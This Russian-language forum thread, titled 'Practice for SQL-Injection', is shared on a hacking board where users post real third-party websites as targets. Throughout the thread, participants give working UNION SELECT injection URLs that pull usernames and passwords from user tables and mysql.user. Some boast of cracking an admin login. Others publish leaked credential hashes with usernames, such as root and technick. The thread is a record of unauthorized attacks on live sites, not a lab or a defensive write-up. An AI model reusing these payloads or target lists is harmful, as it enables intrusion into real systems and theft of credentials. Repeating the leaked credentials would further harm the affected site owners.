.::AngryHacker.4bb.ru::. |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » .::AngryHacker.4bb.ru::. » Общий » Практика по SQL-Injection.
Сюда я буду выкладывать все найденные сайты с SQL-инъекциями. Незабывайте описывать свои успехи ниже.
Вот вам несколько сайтов для практики:
http://www.fieldtripearth.org/div_index.xml?id=2'
http://www.uazmadi.ru/news.php?news_id=1'
http://www.jurstar.ru/advokat.php?id=2-1'
Ломайте на здоровье 
http://www.fieldtripearth.org/div_index.xml?id=2'
Хрен... Прав на Select походу нет...
http://www.uazmadi.ru/news.php?news_id=1'
Тоже хрен. нашел таблицу юзеров и пасвордов. SELECT command denied to user и этим все сказано.
http://www.jurstar.ru/advokat.php?id=2-1'
Тоже нихрена )) не удается даже определить кол-во столбцов... и ковычку вконце ты зря поставил...
Мда... Наломал на здоровье...
Тогда я сам попробую. Может сломаю 
Позже еще парочку выложу.
Ахаха!! )) Сегодня искал sql inj в гугле, наткнулся на сайт
_http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=83'
Пытался определить столбцы, а он мне выкинул... Ну, вообщем, читаем сами
_http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-83+order+by+1/*
Вот, взломал недавно:
_http://www.irpp.ru/news.php?cat=-1+union+select+1,2,3,4,5,concat(n ame_firm,0x3a,email_firm,0x3a,password_firm),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+firm/*
_http://www.irpp.ru/news.php?cat=-1+union+select+1,2,3,4,5,concat(users_log in,0x3a,users_password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users/*
Было сложно name_firm и password_firm я узнал посмотрев код, а вот с users_login и users_password хрен. Пришлось наугад.
Ах, да... Пробрутил я хешик. вышло логин:пасс - admin:admin !!! Я думал, что такие админы есть только в америке... 
Ахахаха!!! Еще один!
_http://www.israelfootball.com/news.php?type=-1+order+by
Шутники ))
Цитата: _http://www.israelfootball.com/news.php?type=-1+order+by
Ржунимагу!!!! Люди гонят!!
Вот еще сайты для практики:
http://www.uvacres.org/faculty_page.php?id=1'
http://capitansilver.ru/?id=6'
http://www.classifields.ru/129/?field=2'
было скучно, взломал еще один
_http://www.artmaterial.ru/about. php?content=dealer&id=-1+union+select+1,2,3,concat(user_login,0x3a,user_password),5,6,7,8,9,10,11,12+from+users/*
Может кто-то сможет подобрать таблицу?
_http://www.music.md/news.php?rid=1111111+union+select+1,2,3,4,5,6+from+xxx/*
_http://www.dancechicago.com/htmls/details.php?program=-1+union+ select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*
root:0fab5be26535005a
_http://sport.infotree.ru/index.php?m=clause&action=prev iew_clause&id_cl_cat=4&id_clause=-1+union+select+co ncat(login,0x3a,password),2,3,4+from+ user/*
technick:568d8766044c9b00 (q2dm0)
http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-83+order+by+1/*
вот это тема))
Вы здесь » .::AngryHacker.4bb.ru::. » Общий » Практика по SQL-Injection.
